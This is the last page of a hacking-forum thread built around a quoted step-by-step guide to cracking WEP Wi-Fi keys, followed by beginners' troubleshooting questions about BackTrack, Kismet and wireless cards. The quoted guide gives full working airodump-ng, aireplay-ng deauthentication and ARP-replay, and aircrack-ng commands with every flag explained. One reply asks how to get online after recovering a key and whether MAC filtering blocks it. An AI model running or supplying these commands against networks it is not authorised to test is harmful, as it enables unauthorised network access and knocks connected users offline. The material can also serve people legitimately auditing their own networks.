Page 16 of 16 FirstFirst ... 6141516
Results 151 to 159 of 159

Thread: Newbie Guide:- How to crack a WEP key, step by step. By another newbie.

  1. #151
    Just burned his ISO
    Join Date
    Dec 2007
    Posts
    3

    Default BT2 plus Netgear WG511T ..do i need drivers and patches??

    Guys,
    I am doing all my homework, so do think I am not responsible ..n pardon my ignorence...I have BT2 live cd and just got a WG511T card do i now need to d/l drivers and patches for my card or will it work out of the box??

    when i do a iwconfig and start the card in monitor mode I observed the following
    1. the AP says = not associated where as i should be getting a 6 figeurs number.

    2. the bit rate = 0 kbps


    is that normal?? wat ami doing wrong?

  2. #152
    vnxdragon
    Guest

    Default I got the key, now problem.....

    Quote Originally Posted by BigDook View Post
    Hi

    I have downloaded the latest BT and finally figured out how to crack a WEP key. Thought i'd post my routine for anyone else who might be having trouble.

    BTW, i'm a complete newbie to BT and any Linux related stuff, but will be hoping to change that.

    OK, first off some quick info on my specs. Acer Laptop (CeleronM) with built in Atheros 5005 wireless.

    1. Fire up Kismet and find the AP you wanna access, sort the listed AP's by using "S" then "C". Then select your AP, hit "Enter" to get any info you may need from it (MAC Address, WEP, Channel etc.) Then press "q" to come out of that details screen, and with my AP select type "L"(capital) which as far as i can see makes your card lock onto that AP.

    2. Open a console screen, then enter the following command to launch AiroDump which will "sniff" the packets about you.

    Command = "airodump-ng -w capture -c 6 ath0"

    OK, "airodump-ng" is the program itself.
    "-w capture" Gets it to write the sniffed packets to a file called "capture.cap".
    "-c 6" Makes the program ONLY sniff on channel 6.
    "ath0" The name of my wireless card.

    Leave that running, and keep an eye on the MAC address of your desired AP and the packets/data increasing (the Data is the IV's)

    3. Open another console to be used to make AirePlay perform a DE-AUTH attack on a specific machine connected to that AP. This should make that specific machine disconnect and reconnect to the AP, and in the process make it send data to the AP which will include the WEP key.

    Command = "aireplay-ng -e DLINK -a 00:11:22:33:44:55 -c 66:77:88:99:00:AA --deauth 10 ath0"

    "aireplay-ng" is the program itself
    "-e DLINK" is the name of the SSID of the target AP.
    "-a 00:11:22:33:44:55" is the MAC address of the target AP.
    "-c 66:77:88:99:00:AA" is the MAC address of the target machine connected to that AP (you should be able to find any machines connected to the AP from looking at the info in AiroDump).
    "--deauth 10" The type of attack we're performing, in this case it's the DEAUTH attack repeated 10 times.
    "ath0" The name of my wireless card.

    Have that command ready to go, but don't do it yet.

    4. Open another console screen, and again we're going to use AIREPLAY, but this time it's going to capture some packets that might contain any IV data, then keep repeating to pump this info to the AP by "pretending" to be the target machine that the other instance of Aireplay performed the DEAUTH attack on.

    Command = "aireplay-ng --arpreplay -b 00:11:22:33:44:55 -h 66:77:88:99:00:AA ath0"

    "aireplay-ng" Name of the program.
    "--arpreplay" Is the function of aireplay you are trying to perform, in this case it's a replay of a ARP request, which will contain IV data.
    "-b 00:11:22:33:44:55" MAC address of the target AP.
    "-h 66:77:88:99:00:AA" MAC address of the target machine connected to that AP.
    "ath0" Name of my wireless card.

    Right, run that command, and you should see it searching for packets.

    Fire off the previous command to initiate the DEAUTH attack, then switch back to the aireplay replay screen. And you should see it detect a deauth/discon of a machine, then it capture that packet, and start repeating to pump it back to the AP by pretending to be the target machine.

    Flick over to airodump screen, and HOPEFULLY it should have lots of DATA or IV packets coming through.

    You can close down the DEAUTH screen of aireplay now, and then let the other one keep replaying that packet until you feel you have enough packets to crack it, or just start the crack whilest more packets keep flooding through.

    5. Open the FINAL console screen which will be used to run AirCrack which will scan the captured packets from AiroDump.

    Command = "aircrack-ng -f 4 -m 00:11:22:33:44:55 -n 64 capture.cap

    "aircrack-ng" Name of the program.
    "-f 4" Run the Fudgefactor 4 times (hehe, i have no idea what this is but apparently increase the fudgefactor to have a better chance of finding the key, but will take longer the higher the number".
    "-m 00:11:22:33:44:55" MAC address of the target AP, so your not searching packets of AP's that you don't wanna crack.
    "-n 64" The amount of bits in the key, in this case it's 64, but theres also 128 etc.
    "capture.cap" Name of the capture file being created by AiroDump.

    Fire it off, and depending on how quick your machine is, how many IV's you've capped or what bit your key is (in my case only 64) and BINGO! It finds the key.

    I tested this on my home AP so i already knew the key, and only used one laptop.


    Am sure i've got some terms wrong, or could do it more efficently, but this worked for this newbie, and i'm a very happy chap.

    Hope it helps anyone.

    TOTAL NOOB I AM. I got the keys, connected but no activity, can't go online, browser won't load any page, any ideas on what's going on ? what can I do from here? I wonder if it has anything to do with Mac Filtering? Please help or point to the right resource

  3. #153
    Junior Member
    Join Date
    Jan 2008
    Posts
    80

    Default cant access xploitz tuts

    Can some please give me link where i can download xploitz tutorials or watch them cos each time i click on them it dont let me access them

  4. #154
    Just burned his ISO
    Join Date
    Feb 2008
    Posts
    1

    Default for newbies?

    you might want to explain AP, kismet, BT..
    or don't call it a newbies guide


    (Admin edit: I've validated this post.........but how noob should we expect a newbie to really be!?!? If you're wanting to play with wifi but don't know what an AP is, then I just don't know what to say! As for Kismet - Google it........visit the Kismet web site, familiarise yourself, etc. There's a difference between a "newbie guide" and a complete "hand holding guide" Some effort is expected on the users part )

  5. #155
    Just burned his ISO
    Join Date
    Apr 2008
    Posts
    8

    Default Backtrack Freezing?

    Thanks for the tutorial, I have picked up quite a few things by reading through it as well as all the posts for replies. But I am a little stuck.

    I get to the point where I send the following commands

    aireplay-ng --arpreplay -b 00:11:22:33:44:55 -h 66:77:88:99:00:AA ath0

    and then this in another console
    aireplay-ng -e DLINK -a 00:11:22:33:44:55 -c 66:77:88:99:00:AA --deauth 10 ath0

    Now at this point the first command runs fine, but it tells me that the deauth is in progress and my system locks up. the keyboard doenst work, i can move things with my mouse, but nothing changes from that point on.

    No I have seen a few other tutorials where they use the mac address of thier card in the previous commands. This tutorial leads me to believer that I use the BSSID and the Station addresses. Is this correct?

    By the way Im using the Backtrack 3 beta, if it matters. Thank you all in advance for the help.

    ~Nightwork

  6. #156
    Just burned his ISO
    Join Date
    Jun 2008
    Posts
    2

    Default

    Hi, i was wondering if anyone knew where i could get kismet as the links all seem to crash.

    Sorry i'm just starting from scratch and i dont even know what cards i need to make this work. Ive only got a wireless router and a plug in usb adapter to use this

    thanks
    will

  7. #157
    Just burned his ISO
    Join Date
    Jun 2008
    Posts
    11

    Default

    Heyhey =D,

    Goddamn all my probs on Backtrack
    My problem which i have is with kismet ¬¬
    I can't find it in Backtrack or boot it.
    If i type
    kismet
    it gives some text and than says Fatal error
    and in the start menu kismet can't be found

    editL i found it but a shell comes up and dissapears immediatly

  8. #158
    Junior Member
    Join Date
    Apr 2007
    Posts
    57

    Default

    Quote Originally Posted by beerieboy123 View Post
    Heyhey =D,

    Goddamn all my probs on Backtrack
    My problem which i have is with kismet ¬¬
    I can't find it in Backtrack or boot it.
    If i type
    kismet
    it gives some text and than says Fatal error
    and in the start menu kismet can't be found

    editL i found it but a shell comes up and dissapears immediatly
    http://forums.remote-exploit.org/showthread.php?t=20182

    Kismet is looking for the device to use.

    This is quite a common problem and is also documented several times. I have only posted you one link, but there are quite a few posts explaining this.

    Out of interest what is the device you are using?
    One word : SEARCH

  9. #159
    Just burned his ISO
    Join Date
    Jun 2008
    Posts
    11

    Default

    *almost ashamed* xD
    Wifimax Dongle for WII and Nintendo Ds xD
    aahw god, im cheap xD
    ty for the link =P
    I'll try to fix it
    (Yes, you can use the dongle in BT2, did it earlier)

Page 16 of 16 FirstFirst ... 6141516

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •